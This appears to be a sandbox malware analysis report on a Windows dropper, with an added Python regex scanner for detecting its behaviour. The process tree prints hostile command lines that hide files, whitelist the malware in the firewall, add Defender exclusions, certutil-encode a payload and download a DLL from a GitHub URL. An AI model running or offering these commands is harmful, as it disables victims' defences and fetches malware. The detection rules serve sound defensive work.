Analysis
max time kernel: 5s
max time network: 140s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 07/01/2024, 19:22
Static task: static1
Behavioral task: behavioral1
  Sample: aa947ac87e8151f7a183a3ce9b0d5860.exe
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: aa947ac87e8151f7a183a3ce9b0d5860.exe
  Resource: win10v2004-20231222-en
General
Target: aa947ac87e8151f7a183a3ce9b0d5860.exe
Size: 14.2MB
MD5: aa947ac87e8151f7a183a3ce9b0d5860
SHA1: 02a6e9b5306695b60e58ff01ea8accc57759d6df
SHA256: ca1cabde17679a02f29582e8e15a59936bb6aea4c54793e1e01e1c2305c8b6a0
SHA512: 1d77c6550e4426b9127f5887fa0b9294535bbca37e8814b2753b43b8f6e011584e3fd91917dc01b8606ea70457032f92cf6206eadef0437b9f0da50b3ddc28cd
SSDEEP: 196608:Zu/SB9ssPSSBsElKV1bIQWfjnXVnvOlRusma7glv2Xnr6swPGOkB2bilY2nw:ug9soFplSMnF87glvQmvPlbyY
Malware Config
Extracted: https://github.com/NGROKC/CTC/raw/main/SInject2.dll
Signatures

Contains code to disable Windows Defender (2 IoCs)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
  resource                                                                     yara_rule
  behavioral1/memory/2320-1-0x00000000010B0000-0x0000000001EE6000-memory.dmp   disable_win_def
  behavioral1/memory/872-121-0x00000000009F0000-0x0000000001826000-memory.dmp  disable_win_def

Modifies Windows Firewall (1 TTPs, 2 IoCs)
  pid   Process
  1720  netsh.exe
  1788  netsh.exe

Sets file to hidden (1 TTPs, 2 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
  pid   Process
  1940  attrib.exe
  2164  attrib.exe

Executes dropped EXE (1 IoCs)
  pid   Process
  2088  tmp1D02.tmpDawn Launcher V2.exe

Loads dropped DLL (2 IoCs)
  pid   Process
  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe
  2512  Process not Found

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Drops file in System32 directory (2 IoCs)
  description   ioc                                     Process
  File created  C:\Windows\SysWOW64\libcrypto-1_1.dll   tmp1D02.tmpDawn Launcher V2.exe
  File created  C:\Windows\SysWOW64\libssl-1_1.dll      tmp1D02.tmpDawn Launcher V2.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
  pid   Process
  2088  tmp1D02.tmpDawn Launcher V2.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2088  tmp1D02.tmpDawn Launcher V2.exe
  2088  tmp1D02.tmpDawn Launcher V2.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description                      pid   Process
  Token: SeDebugPrivilege          2088  tmp1D02.tmpDawn Launcher V2.exe
  Token: SeLoadDriverPrivilege     2088  tmp1D02.tmpDawn Launcher V2.exe
  Token: SeRestorePrivilege        2088  tmp1D02.tmpDawn Launcher V2.exe
  Token: SeTakeOwnershipPrivilege  2088  tmp1D02.tmpDawn Launcher V2.exe

Suspicious use of WriteProcessMemory (8 IoCs)
  description                       pid   Process                               procid_target
  PID 2320 wrote to memory of 2088  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  30
  PID 2320 wrote to memory of 2088  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  30
  PID 2320 wrote to memory of 2088  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  30
  PID 2320 wrote to memory of 2088  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  30
  PID 2320 wrote to memory of 1228  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  33
  PID 2320 wrote to memory of 1228  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  33
  PID 2320 wrote to memory of 1228  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  33
  PID 2320 wrote to memory of 1228  2320  aa947ac87e8151f7a183a3ce9b0d5860.exe  33

Views/modifies file attributes (1 TTPs, 2 IoCs)
  pid   Process
  1940  attrib.exe
  2164  attrib.exe
Processes
(Each entry lists the image path, then the command line as launched; indentation follows the parent/child depth the sandbox reported.)

C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe
  "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 2320

    C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2088

    C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
      PID: 1228

    C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe
      PID: 1604

C:\Windows\SysWOW64\attrib.exe
  attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
  - Sets file to hidden
  - Views/modifies file attributes
  PID: 1940

C:\Windows\explorer.exe
  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  PID: 1208

    C:\Users\Admin\AppData\Roaming\Dawn.exe
      "C:\Users\Admin\AppData\Roaming\Dawn.exe"
      PID: 872

        C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe
          "C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe"
          PID: 3060

        C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
          PID: 768

        C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
          - Modifies Windows Firewall
          PID: 1788

        C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
          - Modifies Windows Firewall
          PID: 1720

        C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
          PID: 2832

        C:\Windows\SysWOW64\certutil.exe
          certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
          PID: 2620

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" Get-MpPreference -verbose
          PID: 2424

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit
          PID: 2476

C:\Windows\SysWOW64\attrib.exe
  attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
  - Sets file to hidden
  - Views/modifies file attributes
  PID: 2164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
  PID: 2660
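The process tree above spells out the evasion chain in plain command lines: attrib +s +h +r to hide the dropper and Dawn.exe, netsh firewall add allowedprogram to whitelist Dawn.exe, Set-MpPreference -ExclusionExtension to exclude the extensions the payloads use, certutil -encode on the staged SInject1.exe, and a WebClient.DownloadFile fetch of SInject2.dll from GitHub. Note also that Dawn.exe is started through explorer.exe, so it shows up under explorer.exe rather than under the dropper. What follows is an added example, not part of the sandbox report and not the sample's own code: a small Python scanner that applies regex rules for those five behaviours to process-creation command lines (for instance the CommandLine field of Sysmon Event ID 1 or Security event 4688) and tags each hit with an ATT&CK technique ID. SAMPLE_CMDLINES is constructed from the command lines on this page plus two benign lines; the rule names, the regexes and the technique mapping are my own choices for this example, not something the report states.

```python
"""Regex hunt rules for the defence-evasion command lines seen in this report.

Feed it (image, command line) records from process-creation telemetry
(Sysmon Event ID 1 / Security 4688). Each matching rule yields a Hit
tagged with an ATT&CK technique ID. Rule names, patterns and the
technique mapping are the editor's own choices for this added example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str      # MITRE ATT&CK technique ID (editor's mapping)
    pattern: re.Pattern


@dataclass(frozen=True)
class Hit:
    rule: str
    technique: str
    image: str
    cmdline: str
    url: Optional[str] = None   # first URL found in the command line, if any


RULES: List[Rule] = [
    # attrib +h (optionally with +s/+r) hides the file from Explorer listings
    Rule("attrib_hide_file", "T1564.001",
         re.compile(r"\battrib(?:\.exe)?\b.*\+[a-z]*h", re.I)),
    # legacy 'netsh firewall' allow entries and current 'netsh advfirewall' rules
    Rule("netsh_firewall_allow", "T1562.004",
         re.compile(r"\bnetsh(?:\.exe)?\b.*(?:firewall\s+add\s+allowedprogram"
                    r"|advfirewall\s+firewall\s+add\s+rule)", re.I)),
    # Defender exclusions added, or real-time monitoring switched off, via PowerShell
    Rule("defender_exclusion_or_disable", "T1562.001",
         re.compile(r"\b(?:Set|Add)-MpPreference\b.*-(?:Exclusion(?:Extension|Path|Process)"
                    r"|DisableRealtimeMonitoring)", re.I)),
    # certutil used as an encoder/decoder/downloader instead of for certificates
    Rule("certutil_encode_decode", "T1140",
         re.compile(r"\bcertutil(?:\.exe)?\b.*\s-(?:encode|decode|urlcache)\b", re.I)),
    # in-script downloaders (WebClient.DownloadFile/DownloadString, IWR, BITS)
    Rule("powershell_download", "T1105",
         re.compile(r"\.Download(?:File|String)\(|Invoke-WebRequest|Start-BitsTransfer", re.I)),
]

URL_RE = re.compile(r"https?://[^\s'\"),]+", re.I)

# Constructed sample: (image, command line) records copied from the process
# tree on this page, plus two benign lines the rules must leave alone.
SAMPLE_CMDLINES: List[Tuple[str, str]] = [
    ("cmd.exe", r'cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"'),
    ("attrib.exe", r'attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"'),
    ("netsh.exe", r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE'),
    ("certutil.exe", r"certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin"),
    ("powershell.exe", r'"powershell" Get-MpPreference -verbose'),
    ("powershell.exe", r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit'),
    ("powershell.exe", r"powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit"),
    ("explorer.exe", r"C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"),
    ("attrib.exe", r"attrib -r C:\Users\Admin\Documents\notes.txt"),
]


def scan_cmdline(image: str, cmdline: str) -> List[Hit]:
    """Return one Hit per rule that matches a single process-creation record."""
    hits: List[Hit] = []
    for rule in RULES:
        if rule.pattern.search(cmdline):
            m = URL_RE.search(cmdline)
            hits.append(Hit(rule.name, rule.technique, image, cmdline,
                            m.group(0) if m else None))
    return hits


def scan_events(events: List[Tuple[str, str]]) -> List[Hit]:
    """Scan a batch of (image, cmdline) records in order; wrappers such as
    'cmd.exe /c attrib ...' fire the same rule as the child attrib.exe."""
    return [hit for image, cmdline in events for hit in scan_cmdline(image, cmdline)]


def technique_summary(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per ATT&CK technique, e.g. for a one-line triage summary."""
    counts: Dict[str, int] = {}
    for hit in hits:
        counts[hit.technique] = counts.get(hit.technique, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_events(SAMPLE_CMDLINES)
    for h in found:
        print(f"{h.technique:<10} {h.rule:<30} {h.image:<15} {h.url or ''}")
    print(technique_summary(found))
```

The Get-MpPreference line is deliberately not flagged: reading Defender preferences is routine administrative activity, and on this page it only matters because the same parent (Dawn.exe, PID 872) follows it with Set-MpPreference. If you want that read-then-write sequence, correlate hits by parent PID in your SIEM rather than widening the regex. The URL pulled from the download hit is the same one the report lists under Malware Config, which is the value you would feed to a blocklist or a retro-hunt.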
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 388KB
MD5: 7cb160b0abe15b3cea529ca00f880b63
SHA1: c620a6386f68ff31251e1fe0f774fde80d40399f
SHA256: cc594ca27a74f5c1ab71db3c980c8cb0007a23a84414f3a32ebc92ea95ec82cd
SHA512: 9ab45cc406634b30dfd0686bf2f6c502a1f09f85ddd31048473ce3e7ad681296ff2aad69cbb8a2e978272a5194528d8df25336c555e5e8af15b3338808b67936

Filesize: 92KB
MD5: 4742731bb77c1d125809906c7dafee17
SHA1: c70c2452a184ee3dbaeb5f566569bc235648844d
SHA256: 93ee7f985541332f97d1379c180b31dc185ce283cb32e93115bb75650c33e370
SHA512: 414563c70b97e957cfbc76d344dd64e8a67bdadd606a59178a0b96f80778c42ffaad7e4d4e58dfefbb5982a699165a0ba4d171d006345e79937780d7b63a40b9

Filesize: 649KB
MD5: dd17771ebc61382ea1d84832cd2d886a
SHA1: e2ea1805181ee8beb5d717e6679a3eada8b46d66
SHA256: 9c818d0262c7d1c2ec2c1271ceed8bbb6259341f3d880337afaea0dd772e322e
SHA512: 56089fb66283b771d2e0f7674624c418c0b7d41bf7430df8965207a2bdbffda8ee862913892f0a8da7cfa208e864f3fdc64336c46f1094fb29f1d34154df528d

Filesize: 382KB
MD5: 023866645753eaaf44d90d52b1318774
SHA1: 494b387fbf69c9217c7a59dff4c583c58ae97087
SHA256: 073e485754cba379c158a1e74cb9d38980cd7aa2bf209b3b43e96b8112a67644
SHA512: f0f6e62a36fe8180354af223ea7851eb2933267b0b1da8a6d84d3737156df168ffe6f0da0674f77bf68a1203375828dc0bf72ae4351ffedb3f1a0bc0b80a82be